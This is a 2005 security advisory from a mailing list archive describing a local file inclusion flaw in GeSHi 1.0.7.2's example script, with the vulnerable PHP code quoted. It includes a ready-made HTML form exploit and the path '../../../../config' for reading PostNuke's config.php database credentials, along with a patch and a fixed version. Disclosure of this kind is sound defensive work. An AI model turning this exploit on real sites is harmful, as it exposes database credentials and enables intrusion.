Full Disclosure mailing list archives
GeSHi Local PHP file inclusion 1.0.7.2
From: Maksymilian Arciemowicz <max () jestsuper pl>
Date: Sun, 25 Sep 2005 09:15:47 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[GeSHi Local PHP file inclusion 1.0.7.2]
Author: Maksymilian Arciemowicz ( cXIb8O3 ).17
Date: 21.9.2005
from SECURITYREASON.COM
- --- 0.Description ---
GeSHi started as a mod for the phpBB forum system, to enable highlighting of
more languages than the available (which was 0 ;)). However, it quickly
spawned into an entire project on its own. But now it has been released, work
continues on a mod for phpBB - and hopefully for many forum systems, blogs
and other web-based systems.
Several systems are using GeSHi now, including:
PostNuke - A popular open source CMS
Docuwiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evovling CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in Wikis
TikiWiki - A megapowerful Wiki/CMS, and one I personally use
RWeb - A site-building tool
- --- 1. Local (PHP) file inclusion ---
I have found one bug in file ./contrib/example.php
This file exists in standart packet GeSHi.
In file:
- -10-18-line---
include('../geshi.php');
if ( isset($_POST['submit']) )
{
if ( get_magic_quotes_gpc() ) $_POST['source'] =
stripslashes($_POST['source']);
if ( !strlen(trim($_POST['source'])) )
{
$_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] .
'.php'));
$_POST['language'] = 'php';
}
- -10-18-line---
Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can
read any php file
(for example in postnuke -config.php-).
You need use varible $_POST['language'] wher is path to php file.
I have tested this bug in GeSHi package and in PostNuke 0.760.
PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)
We can read config.php in PostNuke where we have login, password, dbname and
dbhost.
All variables needed to log in to database.
So we can just use this exploit below :
- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---
<center><a href="http://securityreason.com";
target="http://securityreason.com/";><img
src="http://securityreason.com/gfx/small_logo.png";></a><p>
<form action="http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php";
method="post">
Path to file:<br>
example: <b>../../../../config</b><br>
<textarea name="language"></textarea><br>
<input type="submit" name="submit" value="See">
</form>
- --- EXPLOIT FOR POSTNUKE 0.760 ---
[HOST] = example. http://www.securityreason.com/postnuke/html
any questions? ;]
- --- 2. How to fix ---
Patch
http://securityreason.com/patch/2
works in PostNuke 0.760
or new version of script 1.0.7.3
- --- 3. Greets ---
sp3x
- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDMuOr3Ke13X/fTO4RAtIPAJ9eYAoID8idUKarOBdV2ndLcy0VPgCgmvIm
MWVTap2Adcne2IMt7OpZHmM=
=JulS
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
![http://securityreason.com/gfx/small_logo.png"](http://securityreason.com/gfx/small_logo.png"){kind=link}
Current thread:
- GeSHi Local PHP file inclusion 1.0.7.2 Maksymilian Arciemowicz (Sep 25)
- Re: GeSHi Local PHP file inclusion 1.0.7.2 Brion Vibber (Sep 26)